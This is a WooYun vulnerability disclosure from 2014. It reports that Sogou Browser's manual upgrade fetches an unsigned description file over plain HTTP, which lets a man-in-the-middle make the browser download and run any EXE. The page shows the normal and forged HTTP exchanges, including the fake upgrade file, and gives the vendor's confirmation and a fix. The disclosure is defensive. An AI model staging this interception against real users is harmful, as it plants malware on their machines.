漏洞概要关注数(23)关注此漏洞

漏洞概要
关注数(
23
)
关注此漏洞
缺陷编号：
WooYun-2014-87373
漏洞标题：		搜狗浏览器最新版本升级存在缺陷(可被中间人攻击利用植入木马)
相关厂商：
搜狗
漏洞作者：
内谁
提交时间：		2014-12-16 15:15
公开时间：		2015-03-16 15:16
漏洞类型：		非授权访问/认证绕过
危害等级：		中
自评Rank：		10
漏洞状态：		
															厂商已经确认
漏洞来源：
http://www.wooyun.org
Tags标签：
搜狗浏览器
木马
中间人攻击
2
人收藏
收藏
分享漏洞：
漏洞详情
披露状态：
2014-12-16：	细节已通知厂商并且等待厂商处理中
2014-12-19：	厂商已经确认，细节仅向厂商公开
2014-12-22：	细节向第三方安全合作伙伴开放
2015-02-12：	细节向核心白帽子及相关领域专家公开
2015-02-22：	细节向普通白帽子公开
2015-03-04：	细节向实习白帽子公开
2015-03-16：	细节向公众公开
简要描述：
搜狗浏览器最新版本，升级过程可被中间人攻击利用，可使得获得更新程序的机器被植入任意EXE文件。
详细说明：
搜狗浏览器，手动点击帮助菜单内的在线升级时，会访问一个URL：
http://p3p.sogou.com/upgrademanual.php?h=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&v=5.1.7.15323&r=0000
返回值是一个升级程序的描述文件，没有的话返回ASCII：0
攻击者如果伪造这个描述文件，并实现中间人攻击，就可以欺骗目标主机，替换描述文件
接下来，搜狗浏览器会自动根据描述文件，下载并校验MD5值和大小，如果合法，直接运行
幸运的是，该漏洞只存在于手动升级，自动升级描述文件格式不同，暂不受影响
漏洞证明：
正常的请求及回应：
code 区域
GET /upgrademanual.php?h=7BBA50C84B9DF6239B9102C5109CA722&v=5.1.7.15323&r=0000 HTTP/1.1
Host: p3p.sogou.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0
Accept-Encoding: gzip, deflate
Cookie: lstCday=16; columnnum=2; SUV=008976A67CCD0982548FCE4D8773C573; m=7BBA50C84B9DF6239B9102C5109CA722; IPLOC=CN1100
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 16 Dec 2014 06:55:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.1.6
0
实现中间人攻击后的请求及回应：
code 区域
GET /upgrademanual.php?h=7BBA50C84B9DF6239B9102C5109CA722&v=5.1.7.15323&r=0000 HTTP/1.1
Host: p3p.sogou.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0
Accept-Encoding: gzip, deflate
Cookie: lstCday=16; columnnum=2; SUV=008976A67CCD0982548FCE4D8773C573; m=7BBA50C84B9DF6239B9102C5109CA722; IPLOC=CN1100
HTTP/1.1 200 OK
Server: nginx/0.7.64
Content-Length: 145
Content-Type: text/html
Accept-Ranges: none
Connection: close
98
[Upgrade]
url=http://download.ie.sogou.com/se/sogou_explorer_10.exe
md5=A6CA386D165B288635BD2FB0BF548D19
size=368640
version=10.1.6.14246
0
伪造的升级描述文件截图：
升级成功后自动运行文件截图：
修复方案：
加密升级描述文件，校验升级文件数字签名
版权声明：转载请注明来源
内谁
@
乌云
漏洞回应
厂商回应：
危害等级：中
漏洞Rank：5
确认时间：2014-12-19 11:43
厂商回复：
感谢支持
最新状态：
暂无
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价
(共
0
人评价)
:
登陆后才能进行评分